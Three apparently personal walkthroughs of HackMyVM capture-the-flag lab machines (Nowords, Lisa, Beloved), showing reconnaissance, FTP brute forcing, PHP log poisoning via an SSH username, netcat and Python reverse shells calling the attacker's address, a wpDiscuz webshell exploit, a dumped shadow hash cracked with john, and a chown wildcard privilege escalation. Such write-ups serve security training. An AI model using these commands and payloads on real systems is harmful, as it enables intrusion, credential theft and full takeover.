HackMyVm Nowords Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Nowords

Below is main steps.

Nmap scan ports, scan port 80, found hints at index.html.

 ~ curl http://192.168.56.100/index.html        
 Hint inside.

 <!-- [usernames and passwords are lowercase] -->

Download robots.txt, it's actually an PNG file, with some strings in it.

[image-20210707134241221.png]

OCR the strings online, make a dic, and scan port 80 again, found only 1 valid files. Download it, and it's actually a JPG file with some strings.

[image-20210707134856042.png]

OCR again, lower the first char of each word, make a dic. Then brute force ftp.

~ hydra -L pass2.txt -P pass2.txt 192.168.56.100 -t 64 ftp -f                                                                                                                                   fish-0 | 0 [12:54:58]
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-06 12:55:22
 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 [DATA] max 64 tasks per 1 server, overall 64 tasks, 5776 login tries (l:76/p:76), ~91 tries per task
 [DATA] attacking ftp://192.168.56.100:21/
 [21][ftp] host: 192.168.56.100   login: sophie   password: natalia
 [STATUS] attack finished for 192.168.56.100 (valid pair found)
 1 of 1 target successfully completed, 1 valid password found
 Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-06 12:56:28

Through the ftp, we can browse the whole machine. In /home/sophie, found command.jpg and log.txt.

In /home/me, found doit.py.

 ~ cat doit.py                                                                        fish-0 | 0 [13:50:38]
 #!/usr/bin/python3
 # coding: utf-8

 import pytesseract
 import os
 try:
     import Image, ImageOps, ImageEnhance, imread
 except ImportError:
     from PIL import Image, ImageOps, ImageEnhance

 def solve_captcha(path):
     captcha = pytesseract.image_to_string(Image.open(path))
     return captcha

 if __name__ == '__main__':
     text = solve_captcha("/home/sophie/command.jpg")
     a = text.split("\n")
     f = open("/home/sophie/log.txt","w")
     f.write(" Executing: "+text)
     f.close()
     os.system(a[0])

The script means, we need to put and bash command in command.jpg, then cron job will do OCR and run the command.

We put shell code in command.jpg, then upload through ftp.

[image-20210707135227171.png]

Wait a minute, we will get reverse shell.

 ~ nc -nlvp 1234                                                                                                                                                                                 fish-0 | 0 [13:09:25]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49930.
 bash: cannot set terminal process group (136083): Inappropriate ioctl for device
 bash: no job control in this shell
 sophie@nowords:~$

The root step is use the Ubuntu Polkit Vulnerability.

Check the POC here.

https://github.com/Almorabea/Polkit-exploit

[image-20210707134038343.png]

HackMyVm Lisa Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Lisa

Scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 17:f7:58:02:e9:00:69:04:c5:88:ba:65:5a:11:dc:58 (RSA)
 |   256 4c:32:c5:92:8c:d9:06:a4:a9:89:fa:99:92:bb:66:7f (ECDSA)
 |_  256 d1:36:d3:da:2b:7f:d7:03:5f:fc:1b:94:aa:7e:04:af (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80, found nothing useful. Check index.html, notice the hint about domain name vinci.hmv.

 ~ curl http://192.168.56.100/index.html |tail -n 15                                  
           <p>
                 Please report bugs specific to modules (such as PHP and others)
                 to respective packages, not to the web server itself. contact: vinci.hmv
           </p>
         </div>

Add vinci.hmv to /etc/hosts, scan port 80 again, still found nothing useful.

Use gobuster to enum vhosts.

 ~ gobuster vhost -u vinci.hmv  -w  /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -v |grep -v 10719
 ===============================================================
 ...
 Missed: secret.vinci.hmv (Status: 200) [Size: 80]
 ===============================================================
 2021/07/04 15:35:24 Finished
 ===============================================================

Add secret.vinci.hmv to /etc/hosts, scan files again, found file.php.

 ~ gobuster dir -u http://secret.vinci.hmv -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medi
 um.txt  -x .html,.php,.txt,.zip,.bak,.php.bak -b 401,403,404,500 --wildcard   -o 80_secret.log
 ===============================================================
 /index.html           (Status: 200) [Size: 80]
 /file.php             (Status: 200) [Size: 0]

Wfuzz to get the param name.

 ~ wfuzz -u 'http://secret.vinci.hmv/file.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000004959:   200        26 L     42 W       1441 Ch     "command"  

Looks like a LFI.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/etc/passwd'                        fish-0 | 0 [15:55:59]
 root:x:0:0:root:/root:/bin/bash
 ...
 leonardo:x:1000:1000:leonardo,,,:/home/leonardo:/bin/bash
 ...

See what files we can read.

~ wfuzz -u 'http://secret.vinci.hmv/file.php?command=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hh 0        
 ********************************************************
 * Wfuzz 3.1.0 - The Web Fuzzer                         *
 ********************************************************      
 ...
 000000188:   200        0 L      1 W        32032 Ch    "/var/log/faillog"
 000000173:   200        1364 L   16410 W    130186 Ch   "/var/log/auth.log"
 000000181:   200        2993 L   17879 W    202004 Ch   "/var/log/dpkg.log"
 000000220:   200        5 L      85 W       74873 Ch    "/var/log/wtmp"
 000000224:   200        0 L      1 W        1152 Ch     "/var/run/utmp"
 000000199:   200        0 L      1 W        292292 Ch   "/var/log/lastlog"

Because auth.log will save the username of ssh login. So we use a shell code as the ssh name.

 ~ ssh '<?php system($_GET[c]);?>'@192.168.56.100    
 <?php system($_GET[c]);?>@192.168.56.100's password:
 Permission denied, please try again.                

Now we can run bash command.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=id'
 ...
 Jun 20 21:55:28 Lisa sshd[7932]: Failed password for invalid user uid=33(www-data) gid=33(www-data) groups
 =33(www-data)
  from 192.168.56.150 port 33632 ssh2
 ...

Get reverse shell.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=nc%20192.168.56.150%201234%20-e%20/bi
 n/bash'
 =====================================================================
 ~ nc -nlvp 1234                                        
 Ncat: Version 7.91 ( https://nmap.org/ncat )          
 Ncat: Listening on :::1234                            
 Ncat: Listening on 0.0.0.0:1234                        
 Ncat: Connection from 192.168.56.100.                  
 Ncat: Connection from 192.168.56.100:52344.            
 id                                                    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)  

There is only one user leonardo, and /opt/cron.sh belongs to him.

```
www-data@Lisa:/home/leonardo$ find / -user leonardo 2>/dev/null
find / -user leonardo 2>/dev/null
/home/leonardo
/home/leonardo/.bash_logout
/home/leonardo/.profile
/home/leonardo/.bashrc
/home/leonardo/.local
/home/leonardo/.local/share
/home/leonardo/.selected_editor
/home/leonardo/user.txt
/opt/cron.sh

Check the source code of cron.sh. 

www-data@Lisa:/opt$ cat cron.sh
cat cron.sh

!/bin/bash

domain='shelly.lisa.hmv'

function check(){

     timeout 1 bash -c "ping -c 1 $domain" > /dev/null 2>&1
 if [ "$(echo $?)" == "0" ]; then
     nohup nc -e /bin/sh $domain 65000
     exit 0
 elseifconfig
     exit 1
 fi                                                        

}

Add the ip of attacker's machine to /etc/hosts.

www-data@Lisa:/opt$ ls -la /etc/hosts
ls -la /etc/hosts
-rw----rw- 1 root root 457 Jun 14 17:55 /etc/hosts
www-data@Lisa:/opt$ echo '192.168.56.150 shelly.lisa.hmv' > /etc/hosts

Wait a minute, we get reverse shell of user leonardo.

 ```
~ nc -nlvp 65000                                                                   curl-0 | 130 [16:15:34]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::65000
 Ncat: Listening on 0.0.0.0:65000
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49036.
 id
 uid=1000(leonardo) gid=1000(leonardo) grupos=1000(leonardo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Upload id_rsa.pub to /home/leonardo/.ssh/authorized_keys and chmod 600. Then we get ssh access.

 ~ ssh leonardo@192.168.56.100                                                      fish-0 | 130 [16:20:35]
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux Lisa 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Mon Jun 14 13:01:44 2021 from 192.168.1.83
 /usr/bin/xauth:  file /home/leonardo/.Xauthority does not exist
 leonardo@Lisa:~$

Check sudo -l.

leonardo@Lisa:~$ sudo -l
 sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
 Matching Defaults entries for leonardo on Lisa:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User leonardo may run the following commands on Lisa:
     (root) NOPASSWD: /usr/bin/efax

Use efax to read shadow file.

```
leonardo@Lisa:~$ sudo efax -d /etc/shadow
sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 10:17 compiled Dec 15 2016 12:12:26
efax: 10:17 opened /etc/shadow
efax: 10:17 Error: tcgetattr on fd=3 failed: Función ioctl no apropiada para el dispositivo
efax: 10:17 Warning: unexpected response "root:$6$RnHOYwKvoinsNFhF$zdIHAyW0TtHpAfnUc2p2bEPaHTuu/vdRFcTOSzOokSflUo/YoqDU3NzSCtm9VRELG53fGVrfen1PNBKGt6gix0:18792:0:99999:7:::"
efax: 10:17 Warning: unexpected response "daemon::18791:0:99999:7:::"
efax: 10:17 Warning: unexpected response "bin::18791:0:99999:7:::"
...

Use john to crack the password hash of root.

~ john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveme (root)
1g 0:00:00:00 DONE (2021-07-05 10:28) 6.666g/s 1706p/s 1706c/s 1706C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Get root at last.

leonardo@Lisa:~$ su root
Contraseña:
root@Lisa:~# id;hostname
uid=0(root) gid=0(root) grupos=0(root)
Lisa

HackMyVm Beloved Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Beloved

Scan for open ports.

 ~ nmap -sV -sC -p- -oN ports.log 192.168.56.100
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
 |   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
 |_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-generator: WordPress 5.7.2
 | http-robots.txt: 1 disallowed entry
 |_/wp-admin/
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Beloved – Just another WordPress site
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 is wordpress. Add beloved to /etc/hosts. Search for vulnerabilities.

 ~ wpscan --url http://beloved -e ap --no-banner --api-token yourkey --force --plugins-detection aggressive |tee wpscan.log
 [+] wpdiscuz
  | Location: http://beloved/wp-content/plugins/wpdiscuz/
  | Last Updated: 2021-05-15T13:40:00.000Z
  | Readme: http://beloved/wp-content/plugins/wpdiscuz/readme.txt
  | [!] The version is out of date, the latest version is 7.2.2
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://beloved/wp-content/plugins/wpdiscuz/, status: 200
  |
  | [!] 1 vulnerability identified:
  |
  | [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
  |     Fixed in: 7.0.5
  |     References:
  |      - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
  |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
  |      - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
  |      - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz
  |
  | Version: 7.0.4 (80% confidence)

Search exp for wpdiscuz.

~ searchsploit wpdiscuz                                                              fish-0 | 0 [21:19:28]
 ------------------------------------------------------------------------ ---------------------------------
  Exploit Title                                                          |  Path
 ------------------------------------------------------------------------ ---------------------------------
 WordPress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticate | php/webapps/49962.sh
 WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticate | php/webapps/49967.py
 WordPress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload | php/webapps/49401.rb
 ------------------------------------------------------------------------ --------------------------------

Run the POC code.

```
~ python3 49967.py -u http://beloved -p /2021/06/09/hello-world/ bash-0 | 0 [12:17:55]

[-] WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox

[+] Response length:[51680] | code:[200]
[!] Got wmuSecurity value: 9c794f21e7
[!] Got wmuSecurity value: 1

[+] Generating random name for Webshell...
[!] Generated webshell name: bhgnpbentfvkgzh

[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:url":"http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php";

Visit the webshell, listen to port 1234, we can get a reverseshell.

http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27

Check sudo -l.

 ```
www-data@beloved:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on beloved:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on beloved:
     (beloved) NOPASSWD: /usr/local/bin/nokogiri

The nokogiri will activate an ruby shell, but the trick is to add an extra parameter for log file.

www-data@beloved:/$ touch /tmp/log.txt                    
 touch /tmp/log.txt
 www-data@beloved:/$ sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
 sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
 Your document is stored in @doc...
 Switch to inspect mode.
 system 'id'
 system 'id'
 uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)
 system '/bin/bash'

Now we are beloved. We upload id_rsa.pub, change to authorzied_keys, to get ssh access.

```
cd .ssh
wget http://192.168.56.150/id_rsa.pub -O authorized_keys
--2021-07-02 06:44:36-- http://192.168.56.150/id_rsa.pub
Connecting to 192.168.56.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [application/x-mspublisher]
Saving to: ‘authorized_keys’
...
chmod 600 authorized_keys

Ssh login as beloved.

~ ssh beloved@192.168.56.100
...
beloved@beloved:~$ id
uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)

Check pspy64.

2021/07/02 06:47:01 CMD: UID=0 PID=1878 | /usr/sbin/CRON -f
2021/07/02 06:47:01 CMD: UID=0 PID=1879 | /bin/sh -c cd /opt && chown root:root *

In /opt, there is only a id_rsa. Maybe it's private key for user root. We need to make it readable for user beloved.

 ```
beloved@beloved:/$ ls -la opt
 total 12
 drwxrwx---  2 root    beloved 4096 Jul  2 06:52 .
 drwxr-xr-x 18 root    root    4096 May 19 10:09 ..
 -rw-------  1 root    root    1823 Jun 27 16:41 id_rsa

Use the chown wildcard vulnerability. See the article here.

beloved@beloved:/opt$ touch ref
 beloved@beloved:/opt$ touch -- --reference=ref

Wait a minute, the id_rsa has been changed to user beloved, which is the owner of file ref.

```
beloved@beloved:/opt$ ls -la
total 12
drwxrwx--- 2 root beloved 4096 Jul 2 06:59 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
-rw------- 1 beloved beloved 1823 Jun 27 16:41 id_rsa
-rw-r--r-- 1 beloved beloved 0 Jul 2 06:58 ref
-rw-r--r-- 1 beloved beloved 0 Jul 2 06:59 '--reference=ref'

Read id_rsa, then we can login ssh as root.

~ ssh root@192.168.56.100 -i key ...
root@beloved:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
beloved